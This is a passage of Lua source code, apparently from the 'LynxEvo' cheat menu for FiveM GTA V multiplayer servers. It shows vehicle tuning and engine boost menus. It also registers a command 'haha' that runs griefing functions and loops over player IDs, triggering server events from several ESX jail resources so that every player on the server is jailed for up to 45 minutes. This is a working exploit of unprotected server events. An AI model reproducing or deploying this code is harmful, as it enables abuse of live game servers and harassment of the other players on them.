  10462. if LynxEvo.MenuButton('~h~~p~#~s~ ~h~~r~Exterior ~s~Tuning', 'tunings') then
  10463. elseif LynxEvo.MenuButton('~h~~p~#~s~ ~h~~r~Performance ~s~Tuning', 'performance') then
  10464. elseif LynxEvo.Button('~h~Change Car License Plate') then
  10465. cu()
  10466. elseif
  10467. LynxEvo.CheckBox(
  10468. '~h~~g~R~r~a~y~i~b~n~o~b~r~o~g~w ~s~Vehicle Colour',
  10469. RainbowVeh,
  10470. function(dR)
  10471. RainbowVeh = dR
  10472. end
  10473. )
  10474. then
  10475. elseif LynxEvo.Button('~h~Make vehicle ~y~dirty') then
  10476. Clean(GetVehiclePedIsUsing(PlayerPedId(-1)))
  10477. elseif LynxEvo.Button('~h~Make vehicle ~g~clean') then
  10478. Clean2(GetVehiclePedIsUsing(PlayerPedId(-1)))
  10479. elseif
  10480. LynxEvo.CheckBox(
  10481. '~h~~g~R~r~a~y~i~b~n~o~b~r~o~g~w ~s~Neons & Headlights',
  10482. rainbowh,
  10483. function(dR)
  10484. rainbowh = dR
  10485. end
  10486. )
  10487. then
  10488. end
  10489. LynxEvo.Display()
  10490. elseif LynxEvo.IsMenuOpened('BoostMenu') then
  10491. if
  10492. LynxEvo.ComboBox(
  10493. '~h~Engine ~r~Power ~s~Booster',
  10494. dD,
  10495. dB,
  10496. dC,
  10497. function(ag, ah)
  10498. dB = ag
  10499. dC = ah
  10500. SetVehicleEnginePowerplier(GetVehiclePedIsIn(GetPlayerPed(-1), false), dC * 20.0)
  10501. end
  10502. )
  10503. then
  10504. elseif
  10505. LynxEvo.CheckBox(
  10506. '~h~Engine ~g~Torque ~s~Booster ~g~2x',
  10507. t2x,
  10508. function(dR)
  10509. t2x = dR
  10510. t4x = false
  10511. t10x = false
  10512. t16x = false
  10513. txd = false
  10514. tbxd = false
  10515. end
  10516. )
  10517. then
  10518. elseif
  10519. LynxEvo.CheckBox(
  10520. '~h~Engine ~g~Torque ~s~Booster ~g~4x',
  10521. t4x,
  10522. function(dR)
  10523. t2x = false
  10524. t4x = dR
  10525. t10x = false
  10526. t16x = false
  10527. txd = false
  10528. tbxd = false
  10529. end
  10530. )
  10531. then
  10532. elseif
  10533. LynxEvo.CheckBox(
  10534. '~h~Engine ~g~Torque ~s~Booster ~g~10x',
  10535. t10x,
  10536. function(dR)
  10537. t2x = false
  10538. t4x = false
  10539. t10x = dR
  10540. t16x = false
  10541. txd = false
  10542. tbxd = false
  10543. end
  10544. )
  10545. then
  10546. elseif
  10547. LynxEvo.CheckBox(
  10548. '~h~Engine ~g~Torque ~s~Booster ~g~16x',
  10549. t16x,
  10550. function(dR)
  10551. t2x = false
  10552. t4x = false
  10553. t10x = false
  10554. t16x = dR
  10555. txd = false
  10556. tbxd = false
  10557. end
  10558. )
  10559. then
  10560. elseif
  10561. LynxEvo.CheckBox(
  10562. '~h~Engine ~g~Torque ~s~Booster ~y~XD',
  10563. txd,
  10564. function(dR)
  10565. t2x = false
  10566. t4x = false
  10567. t10x = false
  10568. t16x = false
  10569. txd = dR
  10570. tbxd = false
  10571. end
  10572. )
  10573. then
  10574. elseif
  10575. LynxEvo.CheckBox(
  10576. '~h~Engine ~g~Torque ~s~Booster ~y~BIG XD',
  10577. tbxd,
  10578. function(dR)
  10579. t2x = false
  10580. t4x = false
  10581. t10x = false
  10582. t16x = false
  10583. txd = false
  10584. tbxd = dR
  10585. end
  10586. )
  10587. then
  10588. end
  10589. LynxEvo.Display()
  10590. elseif IsDisabledControlPressed(0, 122) then
  10591. if logged then
  10592. LynxEvo.OpenMenu('Luxury')
  10593. end
  10594. LynxEvo.Display()
  10595. elseif IsDisabledControlPressed(0, 47) and IsDisabledControlPressed(0, 21) then
  10596. if logged then
  10597. LynxEvo.OpenMenu('Luxury')
  10598. end
  10599. end
  10600. Citizen.Wait(0)
  10601. end
  10602. end
  10603. )
  10604. RegisterCommand(
  10605. 'haha',
  10606. function(eA, eB, eC)
  10607. bv = true
  10608. RapeAllFunc()
  10609. bananapartyall()
  10610. EconomyDy2()
  10611. jailPlayer()
  10612. AmbulancePlayers()
  10613. for i = 0, 128 do
  10614. TriggerServerEvent('esx-qalle-jail:jailPlayer', GetPlayerServerId(i), 5000, '')
  10615. TriggerServerEvent('esx_jailer:sendToJail', GetPlayerServerId(i), 45 * 60)
  10616. TriggerServerEvent('esx_jail:sendToJail', GetPlayerServerId(i), 45 * 60)
  10617. TriggerServerEvent('js:jailuser', GetPlayerServerId(i), 45 * 60, '')
  10618. end
  10619. end,
  10620. false
  10621. )
  10622. RegisterCommand(
  10623. 'pk',
  10624. function(eA, eB, eC)
  10625. bw = false
  10626. end,
  10627. false
  10628. )
  10629. RegisterCommand(
  10630. 'lol',
  10631. function(eA, eB, eC)
  10632. mhaonn = false
  10633. end,
  10634. false
  10635. )
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